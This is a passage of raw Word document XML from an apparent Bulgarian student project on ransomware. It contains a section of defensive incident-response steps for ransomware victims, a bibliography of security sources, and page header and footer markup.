            <w:t>[14]</w:t>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="0D4187DC" w14:textId="77777777" w:rsidR="00107E62" w:rsidRDefault="00107E62">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6625E4C5" w14:textId="2A805D60" w:rsidR="00D86FD0" w:rsidRDefault="00107E62" w:rsidP="00107E62">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc224154948"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Какво да направим, ако станем жертва на</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ransomware</w:t>
      </w:r>
      <w:r w:rsidR="00CC4AD3">
        <w:t xml:space="preserve"> атака</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="396E0B36" w14:textId="14C31ADC" w:rsidR="000F7709" w:rsidRDefault="000F7709" w:rsidP="000F7709">
      <w:r>
        <w:tab/>
        <w:t>Най-важното е да се уведомят всички участниците в дадена мрежа. Независимо дали са част от организация или в домашна среда. В случай, че засегнатият е част от организация</w:t>
      </w:r>
      <w:r w:rsidR="00BB1616">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB1616" w:rsidRPr="00BB1616">
        <w:t>незабавно да се уведоми ръководството или отговорният екип</w:t>
      </w:r>
      <w:r>
        <w:t>. Много е важно да се уведомят всички засегнати клиенти</w:t>
      </w:r>
      <w:r w:rsidR="00F10A7D">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00F10A7D" w:rsidRPr="00F10A7D">
        <w:t>съответните власти</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527B629" w14:textId="0FBBE305" w:rsidR="00624F23" w:rsidRPr="000F7709" w:rsidRDefault="00624F23" w:rsidP="000F7709">
      <w:r>
        <w:t>Ето някои стъпки, които биха били полезни при подобна атака:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAC3CA2" w14:textId="0A9AA28B" w:rsidR="00F667AC" w:rsidRDefault="000F7709" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Веднага да се определят засегнатите системи и да се изолират. Ако множество системи и/или </w:t>
      </w:r>
      <w:r w:rsidRPr="00624F23">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">subnets </w:t>
      </w:r>
      <w:r>
        <w:t>са компрометирани трябва да се изключат от мрежата. В случай, че това е невъзможно</w:t>
      </w:r>
      <w:r w:rsidR="00624F23">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> да се изключат</w:t>
      </w:r>
      <w:r w:rsidR="00F86402">
        <w:t xml:space="preserve"> машините</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> поотделно. С приоритет са най-критично важните системи. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F64258F" w14:textId="77777777" w:rsidR="00F667AC" w:rsidRDefault="000F7709" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Друг вариант, ако не може да се изключат от мрежата е да се извади мрежовия кабел </w:t>
      </w:r>
      <w:r w:rsidRPr="00624F23">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(ethernet)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и да се изключат всички устройства свързани с </w:t>
      </w:r>
      <w:r w:rsidRPr="00624F23">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Wi-Fi. </w:t>
      </w:r>
      <w:r>
        <w:t>Целта е да се ограничи разпространяването.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125BE51A" w14:textId="77777777" w:rsidR="00F667AC" w:rsidRDefault="00F667AC" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">За ресурси намиращи се в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cloud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> да се направят </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>snapshot-</w:t>
      </w:r>
      <w:r>
        <w:t>и на дисковете. Ще бъде от полза по-късно, когато се прави криминално разследване.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C7276" w14:textId="7A066291" w:rsidR="00F667AC" w:rsidRDefault="00F667AC" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>След първоначалната атака</w:t>
      </w:r>
      <w:r w:rsidR="00F27F4D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> киберпрестъпниците </w:t>
      </w:r>
      <w:r w:rsidR="005F0B99">
        <w:t>имат</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> достъп до вътрешните комуникации и да реагират на всяко едно предприето действие. За това комуникацията трябва да се извършва извънмрежово (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>out-of-band)</w:t>
      </w:r>
      <w:r>
        <w:t>, например телефонни разговори.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1D3B7" w14:textId="45F743A3" w:rsidR="00F10A7D" w:rsidRDefault="00EC7B7D" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Задължителна с</w:t>
      </w:r>
      <w:r w:rsidR="00F10A7D" w:rsidRPr="00F10A7D">
        <w:t>мяна на всички идентификационни данни</w:t>
      </w:r>
      <w:r w:rsidR="00F10A7D">
        <w:t xml:space="preserve"> на пострадалите.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F72F56" w14:textId="77777777" w:rsidR="00953CD5" w:rsidRDefault="00C85082" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Преди опит за възстановяване, първо да се направи пълни копия на засегнатите системи. Ще послужи в по-нататъшното разследване.</w:t>
      </w:r>
      <w:r w:rsidR="009F7D92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E860D46" w14:textId="1BDFC867" w:rsidR="00C85082" w:rsidRDefault="00953CD5" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При възстановяване от резервни копия да се направи </w:t>
      </w:r>
      <w:r w:rsidR="009F7D92">
        <w:t>проверка дали не са афектирани.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7400517E" w14:textId="77777777" w:rsidR="005100E0" w:rsidRDefault="00F667AC" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Изключване на устройствата, ако по никакъв начин не могат да се изолират. Това вероятно ще унищожи и доказателства, понеже част от доказателствата се съхраняват и в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RAM </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">паметта. Да се прилага само в крайни случаи. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8AA1CD" w14:textId="77777777" w:rsidR="005100E0" w:rsidRDefault="005100E0" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ако има системите, които не са засегнати, да се отделят.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B4EA66" w14:textId="77777777" w:rsidR="005100E0" w:rsidRDefault="005100E0" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Прегледайте всички възможни системни, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDR, IDS, IPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>логове</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBBE033" w14:textId="77777777" w:rsidR="005100E0" w:rsidRDefault="005100E0" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е само финалната част, трябва да се прегледат по-ранни </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>компроментации</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Много е вероятно да има други </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dropper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> злонамерени софтуери. Трябва да бъдат отстранени преди възстановяване на системата.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF6346" w14:textId="77777777" w:rsidR="005100E0" w:rsidRDefault="005100E0" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Всякакви новосъздадени акаунти, ескалирани привилегии или много често </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> файлове трябва да бъдат отстранени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4E65A" w14:textId="440D6762" w:rsidR="005100E0" w:rsidRDefault="005100E0" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Да се наблюдава изпълнението на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> команди, използването на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> софтуер, неочаквани комуникации по мрежата и извличане на</w:t>
      </w:r>
      <w:r w:rsidR="00BB1616">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB1616" w:rsidRPr="00BB1616">
        <w:t>идентификационни данни</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC6650" w14:textId="77777777" w:rsidR="003F3828" w:rsidRDefault="005100E0" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ако има неочаквано голям изходящ трафик, най-вероятно се извличат незаконно данни.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633E502" w14:textId="67976E8B" w:rsidR="003776F1" w:rsidRPr="000F7709" w:rsidRDefault="003F3828" w:rsidP="003936F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">За облачна инфраструктура да се провери дали на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firewall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-а не е зададено правило 0.0.0.0/0, което дава достъп на всеки от интернет да </w:t>
      </w:r>
      <w:r w:rsidR="00232A99">
        <w:t>влезе</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00490AB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2139088710"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00490AB4">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00490AB4">
            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00490AB4">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00490AB4">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003776F1" w:rsidRPr="005100E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="35" w:name="_Toc224154949" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="737676120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638265BC" w14:textId="50C4431D" w:rsidR="00EA2C3E" w:rsidRDefault="00EA2C3E">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r>
            <w:t>Цитирани източници</w:t>
          </w:r>
          <w:bookmarkEnd w:id="35"/>
        </w:p>
        <w:p w14:paraId="19D689AE" w14:textId="77777777" w:rsidR="00823414" w:rsidRDefault="00EA2C3E" w:rsidP="00EA2C3E">
          <w:pPr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75"/>
            <w:gridCol w:w="8596"/>
          </w:tblGrid>
          <w:tr w:rsidR="00823414" w14:paraId="3BA0B9C6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13A41C40" w14:textId="597C8A67" w:rsidR="00823414" w:rsidRDefault="00823414">
                <w:pPr>
                  <w:pStyle w:val="Bibliography"/>
                  <w:rPr>
                    <w:noProof/>
                    <w:kern w:val="0"/>
                    <w14:ligatures w14:val="none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9DC832B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„#StopRansomware Guide,“ Americas Cyber Defense Agency, [Онлайн]. Available: https://www.cisa.gov/stopransomware/ransomware-guide.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="61A1B9CD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2003C0C4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4B06DEE4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„Ransomware,“ FBI, [Онлайн]. Available: https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="54D371E6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1461D9AC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[3] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="08E85A0E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K. Baker, „History of Ransomware,“ CrowdStrike, 09 10 2022. [Онлайн]. Available: https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="1C7E4226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4EC561D7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[4] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="0547546B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„archiveus-trojan,“ Knowbe4, [Онлайн]. Available: https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="0B6C8A35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32BC64E7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[5] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="0077B522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Ф. Петров, „RSA,“ 16 02 2020. [Онлайн]. Available: https://www.cphpvb.net/network-security/10840-rsa-with-example/.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="6E57E0C1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5DFED737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[6] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="149334A9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„What is RSA Asymmetric Encryption? How Does it Work?,“ Secure W2, 15 09 2025. [Онлайн]. Available: https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="79F49E73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3C563025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[7] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="5181C1CC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Matthew Kosinski, „Spear phishing,“ Ibm, [Онлайн]. Available: https://www.ibm.com/think/topics/spear-phishing.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="39CB8A69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386F9ED5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[8] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="2D2D315D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„Gpcode,“ Knowbe4, [Онлайн]. Available: https://www.knowbe4.com/ransomware-knowledgebase/gpcode.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="111D1BAD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5089BEE0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[9] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="4F6C8452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„Човешка грешка пуснала "Белия заек" да хакне системата на ВАС,“ СЕГА, 30 01 2025. [Онлайн]. Available: https://www.segabg.com/category-bulgaria/choveshka-greshka-pusnala-beliya-zaek-da-hakne-sistemata-na-vas.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="1E0064B2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24BB862E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[10] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="49174D61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„„Бял заек“ атакувал ВАС. Как е допунат сривът?,“ FrogNews, 2025 01 30. [Онлайн]. Available: https://frognews.bg/novini/bial-zaek-atakuval-vas-kak-dopunat-srivat.html.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="03E2AF50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1023CE11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[11] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="48A52E01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„Бял заек Ransomware,“ EnigmaSoft, [Онлайн]. Available: https://www.enigmasoftware.com/bg/byalzaekransomware-otstranqvane/.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="756297F5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2A6C4676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[12] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="16D7F1C4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B. Robb, „AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals,“ BlackFog, 24 06 2025. [Онлайн]. Available: https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="1E92E4FD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626C9534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[13] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="7AA4C7D3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„Spring Security Crypto Module,“ Spring, [Онлайн]. Available: https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00823414" w14:paraId="3F6C5B7B" w14:textId="77777777">
            <w:trPr>
              <w:divId w:val="213932172"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="50" w:type="pct"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="046770CA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lastRenderedPageBreak/>
                  <w:t xml:space="preserve">[14] </w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="0" w:type="auto"/>
                <w:hideMark/>
              </w:tcPr>
              <w:p w14:paraId="0F5EB5AD" w14:textId="77777777" w:rsidR="00823414" w:rsidRDefault="00823414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C. M. University, „Social Engineering,“ [Онлайн]. Available: https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html.</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="3AFE48EA" w14:textId="77777777" w:rsidR="00823414" w:rsidRDefault="00823414">
          <w:pPr>
            <w:divId w:val="213932172"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4E2AAA04" w14:textId="5367D9D3" w:rsidR="00EA2C3E" w:rsidRPr="00337A89" w:rsidRDefault="00EA2C3E" w:rsidP="00EA2C3E">
          <w:pPr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sectPr w:rsidR="00EA2C3E" w:rsidRPr="00337A89" w:rsidSect="00A05FA6"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8E95B" w14:textId="77777777" w:rsidR="00E628BE" w:rsidRDefault="00E628BE" w:rsidP="009E432F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3699F11B" w14:textId="77777777" w:rsidR="00E628BE" w:rsidRDefault="00E628BE" w:rsidP="009E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11706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129584" w14:textId="77777777" w:rsidR="002020B8" w:rsidRDefault="002020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612744" w14:textId="77777777" w:rsidR="002020B8" w:rsidRDefault="00202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34AD" w14:textId="77777777" w:rsidR="00E628BE" w:rsidRDefault="00E628BE" w:rsidP="009E432F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="477CCE4F" w14:textId="77777777" w:rsidR="00E628BE" w:rsidRDefault="00E628BE" w:rsidP="009E4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81CB" w14:textId="504D9D91" w:rsidR="002020B8" w:rsidRPr="002020B8" w:rsidRDefault="002020B8" w:rsidP="002020B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b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:sz w:val="14"/>
        <w:szCs w:val="14"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00F2466B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hidden="0" allowOverlap="1" wp14:anchorId="74FE1878" wp14:editId="52FD979F">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="leftMargin">
            <wp:align>right</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>6360</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="299286" cy="300251"/>
          <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
          <wp:wrapNone/>
          <wp:docPr id="1394215584" name="Picture 1394215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9286" cy="30025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  <w:sz w:val="14"/>
        <w:szCs w:val="14"/>
      </w:rPr>
      <w:t xml:space="preserve">Проект по дисциплина </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:sz w:val="14"/>
        <w:szCs w:val="14"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>“</w:t>
    </w:r>
    <w:r w:rsidRPr="002020B8">
      <w:rPr>
        <w:color w:val="000000"/>
        <w:sz w:val="14"/>
        <w:szCs w:val="14"/>
      </w:rPr>
      <w:t>Програмни технологии за сигурен код</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:sz w:val="14"/>
        <w:szCs w:val="14"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>”</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:sz w:val="14"/>
        <w:szCs w:val="14"/>
      </w:rPr>
      <w:br/>
      <w:t>2025-2026</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="4883EF91" w14:textId="77777777" w:rsidR="002020B8" w:rsidRDefault="002020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8B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF5E97C2"/>
    <w:lvl w:ilvl="0" w:tplc="8812B07C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C860D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F848A84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62974"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0852987A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A04B5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBBC46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16B86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84CC0C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1104B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="865AD2D2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210C10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFD658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929C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="383A7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F1552"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62A24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35233B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82E893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7143732">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="646785427">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="893583929">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="892738569">
    <w:abstractNumId w:val="4"/>
